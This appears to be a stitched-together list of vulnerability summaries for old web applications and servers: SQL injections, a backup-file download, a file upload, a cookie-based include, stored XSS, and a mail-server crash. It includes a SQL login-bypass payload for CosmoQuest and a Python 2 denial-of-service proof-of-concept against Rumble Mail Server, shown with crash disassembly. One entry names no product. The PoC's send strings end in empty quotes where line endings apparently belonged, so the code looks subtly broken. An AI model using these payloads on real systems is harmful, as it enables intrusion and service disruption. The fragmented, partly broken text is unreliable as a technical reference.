A buffer overflow vulnerability exists in Word List Builder 1.0 when a specially crafted .dic file is opened, which could allow an attacker to execute arbitrary code. The vulnerability is due to insufficient boundary checks when processing the .dic file. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.
A vulnerability exists in a_viewusers.php that allows SQL injection via the 's' query parameter.
A vulnerability in PHPBoost 3.0 allows an attacker to download the backup database file (*.sql) from the vulnerable server. The vulnerability is due to insufficient access control on the backup directory: an attacker can retrieve the backup file by sending a specially crafted HTTP request to the server.
The vulnerability is triggered by an overly long argument (including the path), which overwrites EIP.
A vulnerability exists in the AdminLogin.asp page of CosmoQuest, which allows an attacker to bypass the login page by using the username 'or''=' and the password 'or''='.
Bigace 2.7.5 is vulnerable to a remote file upload vulnerability. An attacker can exploit this vulnerability by sending a malicious file to the /addon/FCKeditor/editor/filemanager/connectors/uploadtest.html page.
An SQL injection vulnerability exists in IrIran Shoping Script, which allows an attacker to execute arbitrary SQL commands on the underlying database. This can be exploited to gain access to sensitive information, modify data, or even execute system commands. The vulnerability is caused by improper sanitization of user-supplied input in the 'id' parameter of the 'page.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL commands.
Pligg CMS version 1.1.3 is vulnerable to a file existence exploration / shared hosting privilege escalation attack. The attack is possible because the code in config.php near line 80 lets a user set a cookie named 'template' whose value is taken as a directory path. By creating a 'template' cookie that points at a directory under their control, an attacker can make the vulnerable code include() a file from that directory and execute code as the other user. This attack is especially dangerous in a shared hosting environment: the attacker can prepare a 'pligg.tpl' file inside a directory called 'templates' and point the vulnerable code at the directory where they stored it.
A denial of service vulnerability can be exploited to crash Rumble Mail Server v0.25.2231.

Crash (rumble_win32.exe): The instruction at 0x96CEEB referenced memory at 0x41414149. The memory could not be read (0x0096CEEB -> 41414149).

Disassembly:
    .text:0096CEEB mov edx, [ecx+8]
    .text:0096CEEE mov [ebp-8], edx
    .text:0096CEF1 mov eax, [ebp-8]
    .text:0096CEF4 mov ecx, [eax]
    .text:0096CEF6 mov [ebp-0Ch], ecx
    .text:0096CEF9 mov edx, [ebp+0Ch]
    .text:0096CEFC mov [ebp-10h], edx
    .text:0096CEFF
    .text:0096CEFF loc_96CEFF: ; CODE XREF: .text:0096CF31
    .text:0096CEFF mov eax, [ebp-10h]
    .text:0096CF02 mov cl, [eax]
    .text:0096CF04 mov [ebp-11h], cl
    .text:0096CF07 mov edx, [ebp-0Ch]
    .text:0096CF0A cmp cl, [edx]
    .text:0096CF0C jnz short loc_96CF3C

PoC (Python 2):
    import socket

    host = 'localhost'
    tld = 'mydomain.tld'
    port = 25

    def crash():
        for i in range(0, 16):
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((host, port))
            s.settimeout(32)
            junk = 'A' * 4096
            print s.recv(8192)
            s.send('HELO ' + tld + '')
            print s.recv(8192)
            s.send('MAIL FROM ' + junk + '')
            print s.recv(8192)
            s.close()

    crash()
A persistent cross-site scripting vulnerability in Claroline 1.10 can be exploited to execute arbitrary JavaScript. Enter script tags in the first or last name field of a user; the tags are rendered unencoded when the administration user list is viewed.